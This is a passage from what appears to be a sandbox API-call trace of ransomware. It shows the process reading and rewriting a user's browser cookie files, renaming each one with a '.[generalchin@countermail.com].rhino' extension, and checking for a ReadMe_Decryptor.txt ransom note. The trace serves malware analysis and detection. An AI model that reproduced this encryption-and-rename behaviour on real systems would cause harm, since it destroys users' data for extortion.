lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0089.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x172) returned 0x23b0428 [0089.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.174] WriteFile (in: hFile=0x104, lpBuffer=0x23b0428*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0428*, lpNumberOfBytesWritten=0x2cfa04*=0x172, lpOverlapped=0x0) returned 1 [0089.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.174] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x172, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.174] CloseHandle (hObject=0x104) returned 1 [0089.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0428 [0089.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.175] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0089.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.176] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.177] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.177] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.177] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.177] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.177] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x125 [0089.177] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x245, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.177] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.178] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.179] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.180] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x125, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x125, lpOverlapped=0x0) returned 1 [0089.180] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.180] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.180] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.180] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.180] GetLastError () returned 0x0 [0089.180] SetLastError (dwErrCode=0x0) [0089.180] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.180] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x125) returned 0x23b00f0 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0220 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0328 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0220 | out: hHeap=0x6d0000) returned 1 [0089.181] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0220 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b04b0 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0220 | out: hHeap=0x6d0000) returned 1 [0089.182] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x245) returned 0x23b05f8 [0089.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04b0 | out: hHeap=0x6d0000) returned 1 [0089.183] WriteFile (in: hFile=0x104, lpBuffer=0x23b05f8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b05f8*, lpNumberOfBytesWritten=0x2cfa04*=0x245, lpOverlapped=0x0) returned 1 [0089.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05f8 | out: hHeap=0x6d0000) returned 1 [0089.183] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x245, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.183] CloseHandle (hObject=0x104) returned 1 [0089.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0220 [0089.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b04b0 [0089.184] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0220 | out: hHeap=0x6d0000) returned 1 [0089.184] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04b0 | out: hHeap=0x6d0000) returned 1 [0089.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0328 | out: hHeap=0x6d0000) returned 1 [0089.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.277] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xdd [0089.277] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1fd, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.277] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.278] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.279] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.280] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xdd, lpOverlapped=0x0) returned 1 [0089.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.280] GetLastError () returned 0x0 [0089.280] SetLastError (dwErrCode=0x0) [0089.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xdd) returned 0x77f4a0 [0089.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02a0 [0089.280] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.280] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.281] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0198 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0428 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.282] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fd) returned 0x23b0570 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.282] WriteFile (in: hFile=0x104, lpBuffer=0x23b0570*, nNumberOfBytesToWrite=0x1fd, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0570*, lpNumberOfBytesWritten=0x2cfa04*=0x1fd, lpOverlapped=0x0) returned 1 [0089.282] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0570 | out: hHeap=0x6d0000) returned 1 [0089.282] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fd, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.283] CloseHandle (hObject=0x104) returned 1 [0089.288] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0198 [0089.288] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0428 [0089.288] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.288] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0089.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.355] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.355] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.355] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.355] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.419] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x201 [0089.419] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x321, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.420] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.420] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.421] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.422] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x201, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x201, lpOverlapped=0x0) returned 1 [0089.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.423] GetLastError () returned 0x0 [0089.423] SetLastError (dwErrCode=0x0) [0089.423] HeapFree (in: 